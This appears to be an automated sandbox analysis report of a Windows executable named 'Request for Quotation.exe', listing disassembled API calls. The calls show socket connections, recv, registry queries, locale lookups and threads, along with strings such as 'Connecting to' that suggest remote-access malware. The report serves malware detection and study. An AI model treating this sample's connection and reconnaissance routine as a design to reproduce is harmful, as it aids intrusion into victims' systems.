                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE77
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE87
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEA7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CEB7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEC7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CED7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEE7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CEF7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CF51
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 0040CF68
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF74
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF80
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF8C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CF98
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFA4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFB0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFBC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFC8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFD4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFE0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFEC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CFF8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D004
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D010
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D01C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D028
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D034
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D040
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D04C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D058
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D064
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D070
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D07C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D088
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D094
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0A0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0B8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0C4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0D0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0DC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0E8
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D0F4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D100
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D10C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D118
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D124
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D130
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D13C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D148
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D154
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D160
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D16C
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D178
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D184
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D190
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D19C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1A8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D1B4
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                                                                  • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                                                                  • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                                                                  • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                                                                  • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                                                                  • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                                                                  • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                                                                  • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 0040D20B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 0040D21F
                                                                                • CreateThread.KERNEL32(00000000,00000000,00411A24,00000000,00000000,00000000), ref: 0040D240
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D249
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D252
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D27E
                                                                                • atoi.MSVCRT ref: 0040D285
                                                                                • Sleep.KERNEL32(00000000), ref: 0040D293
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoafreegethostbynamehtonsmallocrecvsprintf
                                                                                • String ID: %I64u$2.7.2 Pro$C:\Users\user\Desktop\Request for Quotation.exe$Connected to $Connecting to $Disconnected!$[INFO]$gYX$name
                                                                                • API String ID: 43808216-3342433687
                                                                                • Opcode ID: 2451c82b7e56797327475265fa73bfe04b2c7fe1325af9a44618baad30109576
                                                                                • Instruction ID: 574894a8069dd40dccd63d7f1e28fe1214fcfdb2903245f54546a53b35e7f031
                                                                                • Opcode Fuzzy Hash: 2451c82b7e56797327475265fa73bfe04b2c7fe1325af9a44618baad30109576
                                                                                • Instruction Fuzzy Hash: 615244B2C0021DEBCB15BBA1EC49EDE777CEB54305F1081AAF416A3151EB745B89CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C81C, Relevance: 249.3, APIs: 135, Strings: 7, Instructions: 764sleepthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00412407: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,00017838,0041BCB0,00000000), ref: 00412492
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00017838,0041BCB0,00000000), ref: 0040C83F
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000029), ref: 0040C855
                                                                                • atoi.MSVCRT ref: 0040C85C
                                                                                • Sleep.KERNEL32(00000000), ref: 0040C870
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416954,?), ref: 0040C884
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C898
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B50,?), ref: 0040C8CE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040C8E5
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connecting to ,00000000,00000000,00415B50,00000000), ref: 0040C933
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040C943
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C950
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040C961
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C975
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C981
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C99B
                                                                                • #52.WS2_32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9A2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9D7
                                                                                • atoi.MSVCRT ref: 0040C9DE
                                                                                • #9.WS2_32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040C9E6
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000002,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA10
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA18
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA21
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CA3E
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Connected to ,00000000,00000000,00415B50,00000000), ref: 0040CA92
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,00000000,00415B50,00000000), ref: 0040CAA2
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CAAC
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,00000000,?,?,?,?,00415B50,00000000), ref: 0040CABD
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CAD1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CADD
                                                                                • sprintf.MSVCRT ref: 0040CB14
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B954), ref: 0040CB25
                                                                                • _itoa.MSVCRT ref: 0040CB37
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040CB50
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040CB5D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040CB66
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(name,?,00000104,00000000), ref: 0040CB83
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 0040CBA5
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 00409E7D: GetLocaleInfoA.KERNELBASE(00000800,0000005A,00000000,00000003,0041BFB8,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro), ref: 00409E8E
                                                                                  • Part of subcall function 00409E7D: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CCE4,?,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000,0041B310), ref: 00409E9F
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041BA5C,?), ref: 0040CBCC
                                                                                • GetTickCount.KERNEL32 ref: 0040CC20
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000,0041B310,00000000,0041B310,0041BCD8,0041B310,00000000,0041B310,00000000,0041B310,2.7.2 Pro,0041B310,00000000), ref: 0040CD07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310,00000000), ref: 0040CD37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,00000000,0041B310), ref: 0040CD47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040CD57
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD67
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD77
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CD87
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CD97
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDA7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040CDB7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDC7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDD7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDE7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CDF7
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE07
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE17
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE27
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE37
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE47
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040CE57
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE67
